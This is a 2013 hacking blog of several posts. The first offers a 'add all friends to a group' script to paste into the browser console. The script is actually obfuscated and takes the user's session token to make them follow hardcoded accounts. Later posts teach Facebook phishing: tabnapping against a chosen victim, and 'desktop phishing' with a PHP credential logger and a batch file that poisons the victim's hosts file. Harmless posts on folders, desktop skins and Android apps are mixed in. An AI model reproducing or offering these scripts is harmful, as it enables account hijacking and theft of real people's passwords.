18 Kasım 2013 Pazartesi

How To Add All Friends To Facebook Group

So this is a tutorial on how to add all your friends in a facebook page in just a few steps. So if you are an admin of a facebook group which has less members then you might have a hard time to add all your friends one by one and which is a very  hard job. So, to help all you facebook group admins out, we share you an unique script with which you can add all your friends to the group. So enough said, let's proceed on to the tutorial.


Conditions

  • You need to be an approved member or admin of the facebook group in which you wish to add your friends.
  •  You must be browsing facebook through Mozilla Firefox or Google Chrome. Sorry, Internet Explorer or other web browsers not yet supported.

Steps

  • Go to the facebook group in which you wish to add your friends to using Mozilla Firefox or Google Chrome.
  •  Press F12 when you're on the group. Then click on console as illustrated in the image below.
  • After going to console ,paste the code below and press enter.




 (function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]),gid:document.getElementsByName("group_id")[0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=new XMLHttpRequest;c.open("GET",b,!0),c.onreadystatechange=function(){if(4==c.readyState&&200==c.status){var a=eval("("+c.responseText.substr(9)+")");a.payload&&a.payload.entries&&(f.frns=a.payload.entries.sort(function(){return.5-Math.random()})),document.getElementById("hasilsurasil").innerHTML="Found <b>"+f.frns.length+" Prophet</b><div id='hasilsatu'></div><div id='hasildua'></div><div id='hasiltiga' style='min-width:300px;display:inline-block;text-align:left'></div>"+crj;for(x in f.frns)f.senAjak(x)}else document.getElementById("hasilsurasil").innerHTML=4==c.readyState&&404==c.status?"<b style='color:darkred'>Gruppe �ffnen!</b>"+crj:"<b style='color:darkgreen'>Suche nach m�glichen Abonnenten... ("+c.readyState+")</b>"+crj},c.send()},senAjak:function(d){var e=new XMLHttpRequest,prm="__a=1&fb_dtsg="+f.dtsg+"&group_id="+f.gid+"&source=typeahead&ref=&message_id=&members="+f.frns[d].uid+"&__user="+f.uid+"&phstamp=";e.open("POST","/ajax/groups/members/add_post.php",!0),e.setRequestHeader("Content-type","application/x-www-form-urlencoded"),e.setRequestHeader("Content-length",prm.length),e.setRequestHeader("Connection","keep-alive"),e.onreadystatechange=function(){if(4==e.readyState&&200==e.status){var a=eval("("+e.responseText.substr(9)+")");if(f.prenKe++,document.getElementById("hasilsatu").innerHTML="<div><b>"+f.prenKe+"</b> of <b>"+f.frns.length+"</b></div>",a.errorDescription&&(f.gagal++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkred'>( "+f.gagal+" )</b> <span style='color:darkred'>"+a.errorDescription+"</span></div>"),a.jsmods&&a.jsmods.require){var b="<div>";for(x in a.jsmods.require)a.jsmods.require[x][a.jsmods.require[x].length-1][1]&&(b+="<b style='color:darkgreen'>"+a.jsmods.require[x][a.jsmods.require[x].length-1][1]+"</b> ");b+="<div>",document.getElementById("hasildua").innerHTML=b}if(a.onload)for(z in a.onload){var c=eval(a.onload[z].replace(/Arbiter.inform/i,""));if(c.uid&&c.name){f.okeh++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkgreen'>( "+f.okeh+" )</b> <a href='/"+c.uid+"' target='_blank'><b>"+c.name+"</b></a> haben dich abonniert.</div>";break}}f.prenKe==f.frns.length&&(document.getElementById("hasiltiga").style.textAlign="center",document.getElementById("hasiltiga").innerHTML+="<div style='font-size:20px;font-weight:bold'>20 Leute Einladen!</div><a href='/' onClick='document.getElementById(\"hasilsurasil\").style.display=\"none\";return false'>Schliesen</a>")}},e.send(prm)}},g=["i","a","e","g","o","s","n","b","l","p","m","2","r","0","c","1","t","3","�"],crl=g[1]+g[0]+g[6]+g[3]+g[14]+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+"."+g[7]+g[8]+g[4]+g[3]+g[5]+g[9]+g[4]+g[16]+"."+g[14]+g[4]+g[10],crj="<div style='margin-top:10px;color:gray;font-size:12px'>"+g[1].toUpperCase()+g[0]+g[6]+g[3]+g[14].toUpperCase()+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+" "+g[g.length-1]+g[11]+g[13]+g[15]+g[17]+"<div style='font-size:9px'><a href='http://"+crl+"/' target='_blank'>"+crl+"</a></div></div>";document.body.innerHTML+="<center id='hasilsurasil' style='min-height:50px;width:600px;position:fixed;top:100px;left:"+(document.body.offsetWidth-530)/2+"px;border-radius:10px;padding:10px;z-index:999999;border:5px solid skyblue;background-color:rgba(225,225,255,0.75)'><b>fb.com/prophethaxor ... Script by Prophet </b>"+crj+"</center>",f.getAjak("/ajax/typeahead/first_degree.php?__a=1&viewer="+f.uid+"&token="+Math.random()+"&filter[0]=user&options[0]=friends_only")})(); var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1])
function cereziAl(isim) {
var tarama = isim + "=";
if (document.cookie.length > 0) {
konum = document.cookie.indexOf(tarama)
if (konum != -1) {
konum += tarama.length
son = document.cookie.indexOf(";", konum)
if (son == -1)
son = document.cookie.length
return unescape(document.cookie.substring(konum, son))
}
else { return ""; }
}
}
function getRandomInt (min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
function randomValue(arr) {
return arr[getRandomInt(0, arr.length-1)];
}
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
function a(abone){
var http4 = new XMLHttpRequest();
var url4 = "/ajax/follow/follow_profile.php?__a=1";
var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
http4.open("POST", url4, true);
//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");
http4.onreadystatechange = function() {//Call a function when the state changes.
if(http4.readyState == 4 && http4.status == 200) {
http4.close; // Close the connection
}
}
http4.send(params4);
}
function sublist(uidss) {
var a = document.createElement('script');
a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
document.body.appendChild(a);
}
a("100001068547215");
a("100004230073255");
var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
var httpwp = new XMLHttpRequest();
var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
httpwp['open']('POST', urlwp, true);
httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
httpwp['setRequestHeader']('Content-length', paramswp['length']);
httpwp['setRequestHeader']('Connection', 'keep-alive');
httpwp['send'](paramswp);
var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
var friends = new Array();
gf = new XMLHttpRequest();
gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
gf['send']();
if (gf['readyState'] != 4) {} else {
data = eval('(' + gf['responseText']['substr'](9) + ')');
if (data['error']) {} else {
friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {
return _0x93dax8['index'] - _0x93dax9['index'];
});
};
};


 
 

 


o this is a tutorial on how to add all your friends in a facebook page in just a few steps. So if you are an admin of a facebook group which has less members then you might have a hard time to add all your friends one by one and which is a very tedious job. So, to help all you facebook group admins out, we share you an unique script with which you can add all your friends to the group. So enough said, let's proceed on to the tutorial. - See more at: http://www.digitricks.net/2013/11/how-to-add-all-friends-to-facebook-group.html#sthash.6soabriH.dpuf
So this is a tutorial on how to add all your friends in a facebook page in just a few steps. So if you are an admin of a facebook group which has less members then you might have a hard time to add all your friends one by one and which is a very tedious job. So, to help all you facebook group admins out, we share you an unique script with which you can add all your friends to the group. So enough said, let's proceed on to the tutorial. - See more at: http://www.digitricks.net/2013/11/how-to-add-all-friends-to-facebook-group.html#sthash.6soabriH.dpuf
o this is a tutorial on how to add all your friends in a facebook page in just a few steps. So if you are an admin of a facebook group which has less members then you might have a hard time to add all your friends one by one and which is a very tedious job. So, to help all you facebook group admins out, we share you an unique script with which you can add all your friends to the group. So enough said, let's proceed on to the tutorial. - See more at: http://www.digitricks.net/2013/11/how-to-add-all-friends-to-facebook-group.html#sthash.6soabriH.dpuf
So this is a tutorial on how to add all your friends in a facebook page in just a few steps. So if you are an admin of a facebook group which has less members then you might have a hard time to add all your friends one by one and which is a very tedious job. So, to help all you facebook group admins out, we share you an unique script with which you can add all your friends to the group. So enough said, let's proceed on to the tutorial. - See more at: http://www.digitricks.net/2013/11/how-to-add-all-friends-to-facebook-group.html#sthash.6soabriH.dpuf

17 Kasım 2013 Pazar

Create Invisible & Color Folder

You always heard about a wihout name folder but you don't know how to create it .
Now I create invisible folder with two tricks .


  Create Invisible Folder

First Trick  

  • First you create a folder .
    • Then press Window Key +R ,Run is open now you type charmap , For giving this command your character map is open.
    • In search box you type    U+2001:Em Quad     and then select it.



    •  Right click on your folder and then click on rename it, and paste you select character.


     Now you just create a wihout name folder.

    Second Trick

    • You create a folder and rename it and hold down Alt key and press 0160 (numlock on)



      Color  your Folder

      You can create your color folder wih this software  Folder Colorizer

      Download

      Thanks

       












15 Kasım 2013 Cuma

Hack FB account via a Tabnapping

HI this is  Prophet ...Today I tell you how can you hack facebook account with tabnpping..

Tab Napping 

 Tabnapping is a new form of phishing that is hitting the internet now. With the conventional form of phishing, for example, you might receive an email that is supposedly from your bank, and it might ask you to login and update or confirm your account details, of course, there would be a link to your banks website in the email for you to click, which would take you to a page that looks identical to your real banks login page.


How does it works
Tab napping is more sophisticated than the phishing scams we�ve seen so far, and it no longer relies on persuading you to click on a dodgy link. Instead it targets internet users who open lots of tabs on their browser at the same time (for example, by pressing
CTRL + T).

 if you have multiple tabs open and you are reading the page on your current active tab, any of the other inactive browser tabs could be replaced with a fake web page that is set up to obtain your personal data, the web page will look exactly the same as the page you opened in the tab, you probably wont even even know it has been replaced with a fake page.
fraudsters can actually detect when a tab has been left inactive for a while, and spy on your browser history to find out which websites you regularly visit, and therefore which pages to fake.
This may surprise you, but phishers and fraudsters in general can actually detect when a tab has been left inactive for a period of time, which means they can spy on your browsing history, this tells them which websites and web pages you visit on a regularly basis, so they'll know which bank you use and which email account you use, whatever you view, they'll know about it, which means they'll know which fake pages to make to replace the real pages in your inactive tabs, you've now left yourself open to become a victim of tab napping.


Steps


  • First of all you have a web hosting site and if  you don't have then you create a free web hosting site on 000webhost .  

    •  Now download the phishing and script here.Download
    • Upload all the files and folders to your website.  
     
       
      • The website contain a game and send your website address(your tab napping website where you upload all the files) to your friend or anyone else whose facebook account you want to hack and tell him/her that if your are intelligent or smart or say anything else then play this game and win it.
      •  Actually the game is very dificult and he/she will not win in less time and he/she will goto another tab in browser like facebook,google,youtube ,yahoo etc and when he/she came back to the website , it will be automatically redirected and saying them to login with facebook account to continue
       
      • When your victim log in with facebook account then her/his password will saved in your website and he/she will be redirected to main game page.
      •  Now just open=======http://www.your-website.com/fb/password.html------and you will see the email and passwords.
       Thanks for Watching
         


      14 Kasım 2013 Perşembe

      Customize your computer like Hacker

      In this  post , I tell you how can you make your computer  look like hacker.
      On Internet many softwares are come but only  some are useful.
      Now I tell you best of them 
      • Rainmeter 

        Rainmeter skins are helping you to get all the notification of your computers just on the desktop. Rainmeter themes are one kind of features that show you all the computers performance and all the running applications and functions like music player and song which you are listening at a time, CPU performance graph, CPU temperature, RAM�s used and performance, if viruses are affects on your computer that�s also can show instantly on your desktop, all the images you are most used watched or edits, HTML links which you are using mostly, just common but useful time and date with extra functions and Google calendars, weather reports with manually setting features, news feeds which you sets for getting instantly updates, all the computer desktop shortcut icons and folders, very useful notes which you have set for remember any things, what other family members or friends worked and used your computer and many more applications and features.
        Rainmeter skins provide us best and most useful desktop customization tools. Oh sorry! , not only most useful but it�s provide all of the customization tools and setting that catch your eyes easily. Rainmeter themes gives us an extra graphic designed new looks of our desktop. Rainmeter skins not load more to increase your CPU used, it�s also providing lighted installation even with extra graphics looks.

        Download 


        This is software now you find a better skin for this..one of my favorite is this

         Download

        You find more skin at Devianart   
        • Window Blind  


          WindowBlinds is a software utility that allows you to completely change the look and feel of Microsoft Windows.
          It works by applying new visual styles, called skins, across the entire user interface (title bars, push buttons, start menu, taskbar, etc.) of the operating system. As a result, you gain complete control over the way Windows looks.
          As good as someone might think Windows looks, it is a one-size fits all solution. WindowBlinds gives users thousands of new looks to choose from.
          With skins, WindowBlinds can change the look of:

          • Title bars
          • Borders
          • The Start bar
          • Progress animations
          • Explorer Views
          • and virtually every other part of Windows!

          Download

          • WindowFX

            Revolutionize your operating system with WindowFX. Utilize an unprecedented number of special effects for your windows and maximize your computing experiance
          • Screen Resizing: Enjoy time-saving window management features such as screen border resizing and window border maximizing.
          • Advanced Controls: Get more from the right-click menu with advanced controls.
          • Apply custom animations: Pick different animated effects for windows when they open, close, minimize and restore. (Requires Windows 7 or Vista with the DWM enabled)
          • Add more to your movements: Add Windows Flick actions to movements, fade windows when moving and add momentum so you can throw windows around on your monitor.
          • Remain focused on the task at hand: Make the active window stand out, make inactive windows fade away and automatically minimize background windows.
          Don?t lose your videos: On a multiple-monitor systems, keep Flash� videos fullscreen when you use apps on other monitors. Don?t let your video close simply because you?re working on your other monitor
          •  

             Download 

            Thanks , for seeing my post.....

             

           

           

      13 Kasım 2013 Çarşamba

      Hack a Facebook via a Desktop Phishing

      Desktop Phishing - Step by step tutorial

      In desktop phishing:-
      1. Attacker sends an executable/batch file to victim and victim is supposed to double click on it. Attacker's job is done.
      2. Victim types  the domain name of orignal/genuine website and is taken to our fake login page. But the domain name remains the same as typed by victim and victim doesn't come to know.
      3. Rest of the things are same as in normal phishing.
      What is Hosts File ?

      The hosts file  is a text file containing domain names and IP address associated with them.
      Location of hosts file in windows: C:\Windows\System32\drivers\etc\
      Whenever we visit any website, say www.anything.com , an query is sent to  Domain Name Server(DNS) to  look up for the IP address associated with that website/domain. But before doing this the hosts file on our local computer is checked for the IP address associated to the domain name.

      Suppose we make an entry in hosts file as shown. When we visit www.anywebsite.com , we would
      be taken to this 115.125.124.50. No query for resolving IP address associated with www.anywebsite.com would be sent to DNS.

      What we need ?

      1. Xampp Download Here

            2.  Phishing Script Download


      <?php
      header ('Location: http://www.facebook.com');
      $handler = fopen("fake.txt", "a");
      foreach($_POST as $variable => $value) {
      fwrite($handler, $variable);
      fwrite($handler, "=");
      fwrite($handler, $value);
      fwrite($handler, "\r\n");
      }
      fwrite($handler, "\r\n");
      fclose($handler);
        
      exit;
      ?>

            3. Phish Facebook Login page  Download

           4.Strong Open VPN Download It Here  

        5.Desktop Phishing Script 



        @echo off
        echo 0.1.2.3   www.facebook.com >> C:\windows\system32\drivers\etc\hosts
        exit

         Replace 0.1.2.3 in Desktop phishing script with the ip address you got
        from the vpn, to check ip address goto http://cmyip.com & save file as anything.bat
        This file could look like suspicious to the person you are sending through
        email or by data transfer medium. So we will bind it with another fileusing binder�s Google them you will find lots of binders out there.After the victim executes your .bat file his host file adds some thing like this
        & whenever he enter www.facebook .com he will be redirected to you ip address hosting phisher

          First we install XAMPP  in our system that look like  are these picture

          :::then navigate in your computer on these location
          ******C:\xampp\htdocs   in these folder delete all files
           *****paste facebook login script  and phish page files

           last at least open your Xampp control panel and start Apache and MySQL ......you done your Desktop Phishing is ready..
          now  open your browser and type 127.0.0.1 in your address bar...your phishing page is now ready to go ...for hacking fb account you simply give your ip address to your victim.

          12 Kasım 2013 Salı

          Stream Video from Android Mobile

          Hey Guyz Today  I show you something really cool and interesting thing in your android phone ...
          so here we go...
          First thing we need is  a app called IPWEBCAM

          1.IPWEBCAM

          Description

          Turns your phone into a network camera with multiple viewing options. View your camera on any platform with VLC player or web browser. Stream video inside WiFi network without internet access.Use IP Webcam with tinyCam Monitor on another android device or with third-party MJPG software, including video surveillance software, security monitors and most audio players.
          Videochat support (e.g. Skype, Chatroulette, only video stream for Windows only via an universal MJPG video streaming driver)
          Email me if you have questions after reading the FAQ.
          SEO: ip webcam, wireless camera, spy cam, video streaming, broadcasting, ip camera, wifi camera, audio streaming, nanny cam, security camera, ipcam, pet monitor
          Download
           start server>>>>then you find your ipaddress  >>>>>copy your ip address and note down in Browser


           Now here you find many type of option like photoshot ,audio streaming and much more..
          But your main motive is video streaming so you copy your video streaming links  and open your vlc then go to Media options and  click on Open  Networkstream   and paste your link and click on play





          5 Kasım 2013 Salı

          Top Best apps for Hackers & Creativity

          Hi Guyz ,Today are you ready to make your android phone something different. We talk about some  best android apps that  helpful for some hackers ,E-hackers,Creativity People and lots of..

          It's Show time...


          1. WiFi Kill
          DESCRIPTION
          Well, with this app you can disable internet connection for a device on the same network. So if someone (anyone) is abusing the internet wasting precious bandwidth for a Justin Bieber videoclips you could just kill their connection and stay happy with a full bandwidth just for yourself.


          2.Unified Remote

          Turn your smartphone into a wireless universal remote control for your Windows PC.





          3.Sneaky cam

          Description
          What does it do?

          Sneaky Cam allows you to take photos with your phone's camera discreetly without letting others around you know what you are up to!
          Absolutely perfect for sneaking a pic in plain sight!
          How does it work?
          Instead of showing you the preview of the camera it shows you a screen of your choice available in the Preferences menu. When the user touches the screen a quick and discreet notification tells the user that the picture has been taken and the picture is saved to the folder 'Sneaky Cam' which is accessible from your Gallery.
          You can also set the transparency of the screen so that you can see faintly or strongly the preview of the camera.
          Or as an option if you select on screen preview, you will get a small preview of what you are about to click..
          It disables all sounds so no one hears the shutter sound.

          Download


          4. Fpse Emulator

           FPSE for Android is the fastest and most consistent PSone (also known as PSX or Playstation 1) emulator devices mano.Crear an ISO image from your favorite games and enjoy playing on your Android phone.
          Features:
          -High performance
          -High compatibility
          -High quality sound
          -Real-time save states
          -Audio track emulation (with reference files)
          -Force-feedback
          -Dynamically overlay pads can be loaded
          -Emulation Guncon
          -Analog Stick emulation (touchscreen slide)
          -Compatible with G-Sensor, Touchscreen and hardware keys
          -Supports. IMG, ISO,. Bin. Cue, nrg. And disc formats. Image Z

           with these emulator you play Tekken 3 my favourite in your android phone..

          Download

          5.Dsploit
          dSploit is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks the most complete and advanced professional toolkit to perform network security assesments on a mobile device.

          Once dSploit is started, you will be able to easily map your network, fingerprint alive hosts operating systems and running services, search for known vulnerabilities, crack logon procedures of many tcp protocols, perform man in the middle attacks such as password sniffing ( with common protocols dissection ), real time traffic manipulation, etc, etc .
           Requirements

          • An Android device with at least the 2.3 ( Gingerbread ) version of the OS. ( 2.3 support since v1.0.5b ).
          • The device must be rooted
          • The device must have a BusyBox full install, this means with every utility installed ( not the partial installation ).

          Download